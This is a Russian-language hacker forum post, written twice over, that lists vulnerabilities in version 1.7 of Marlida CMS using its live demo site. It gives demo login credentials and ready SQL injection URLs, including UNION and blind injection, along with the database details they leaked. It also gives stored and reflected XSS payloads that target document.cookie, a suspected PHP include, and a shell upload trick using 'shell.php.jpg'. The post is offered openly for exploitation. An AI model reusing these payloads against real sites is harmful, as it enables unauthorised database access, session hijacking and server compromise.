[Feldmarschall]
24.10.2010, 20:42
Marlida CMS платная (исходников нет)
Данная версия: ver.1.7
________________________________________________
ОФФ САЙТ:http://www.marlida.com/
ЛОГИН/ПАРОЛЬ ДЛЯ ВХОДА (Demo)
username: dexter
password: qdbgtinx
SQL INJECTION
http://demo.marlida.com/?d=games&s=alle&u=&rando=1694072435+OR+1=1
http://demo.marlida.com/index.php?d=ecards&s=schreiben&karte=4132'+union+select+1,2,3,4+and+'1'='1
Крутим как слепую
http://demo.marlida.com/index.php?d=ecards&s=schreiben&karte=41'+and+ascii(substring((version()),14,1))=1 03+and+'null'='null
Code:
version: 4.0.25-Max-log
db: d001f56f
user: d001f56f@localhost
АКТИВНАЯ XSS
В ЧАТЕ
По адрессу http://demo.marlida.com/chat-alle (нужна авторизация)
кто туда теперь зайдет уже нечего там несможнт отписать постоянно вылетает xss.. так что капкан.
В ПРФИЛЕ
Hobbies: ">alert(document.cookie)
Beliebiges Feld: ТУТ XSS
Noch ein Feld: ТУТ XSS
+
"Marktplatz" выбераем "Kleinanzeigen" или "Immobilien" потом "Neus Inserat augeben"
Artikelbeschreibung: ТУТ XSS
ПАССИВНАЯ XSS
http://demo.marlida.com/index.php?d=ecards&s=schreiben&karte=41">alert(document.cookie)
http://demo.marlida.com/index.php?d=mitglieder&altervon=14&alterbis=99&ort=">alert(document.cookie)&ortdis=0
http://demo.marlida.com/index.php?d=forum&q=">alert(document.cookie)
Подозрение на php-include
Code:
http://demo.marlida.com/box.php?iframe=
Пути:
Code:
http://demo.marlida.com/box.php?box=login&d[]=fotos&s=65&u[]=edit
http://demo.marlida.com/index.php?d[]=
http://demo.marlida.com/index.php?d=jobs&s=list&q=&kat=&ort= ПРОБЕЛ &ortdis=10&alter=
Кто доработает все буду тока рад.
[I]з.ы шелл заливается таким файлом "shell.php.jpg" ток толка нету от картинки так что можно забить..
http://demo.marlida.com/box.php?iframe=hotornot&u=neu
Данная версия: ver.1.7
________________________________________________
ОФФ САЙТ:http://www.marlida.com/
ЛОГИН/ПАРОЛЬ ДЛЯ ВХОДА (Demo)
username: dexter
password: qdbgtinx
SQL INJECTION
http://demo.marlida.com/?d=games&s=alle&u=&rando=1694072435+OR+1=1
http://demo.marlida.com/index.php?d=ecards&s=schreiben&karte=4132'+union+select+1,2,3,4+and+'1'='1
Крутим как слепую
http://demo.marlida.com/index.php?d=ecards&s=schreiben&karte=41'+and+ascii(substring((version()),14,1))=1 03+and+'null'='null
Code:
version: 4.0.25-Max-log
db: d001f56f
user: d001f56f@localhost
АКТИВНАЯ XSS
В ЧАТЕ
По адрессу http://demo.marlida.com/chat-alle (нужна авторизация)
кто туда теперь зайдет уже нечего там несможнт отписать постоянно вылетает xss.. так что капкан.
В ПРФИЛЕ
Hobbies: ">alert(document.cookie)
Beliebiges Feld: ТУТ XSS
Noch ein Feld: ТУТ XSS
+
"Marktplatz" выбераем "Kleinanzeigen" или "Immobilien" потом "Neus Inserat augeben"
Artikelbeschreibung: ТУТ XSS
ПАССИВНАЯ XSS
http://demo.marlida.com/index.php?d=ecards&s=schreiben&karte=41">alert(document.cookie)
http://demo.marlida.com/index.php?d=mitglieder&altervon=14&alterbis=99&ort=">alert(document.cookie)&ortdis=0
http://demo.marlida.com/index.php?d=forum&q=">alert(document.cookie)
Подозрение на php-include
Code:
http://demo.marlida.com/box.php?iframe=
Пути:
Code:
http://demo.marlida.com/box.php?box=login&d[]=fotos&s=65&u[]=edit
http://demo.marlida.com/index.php?d[]=
http://demo.marlida.com/index.php?d=jobs&s=list&q=&kat=&ort= ПРОБЕЛ &ortdis=10&alter=
Кто доработает все буду тока рад.
[I]з.ы шелл заливается таким файлом "shell.php.jpg" ток толка нету от картинки так что можно забить..
http://demo.marlida.com/box.php?iframe=hotornot&u=neu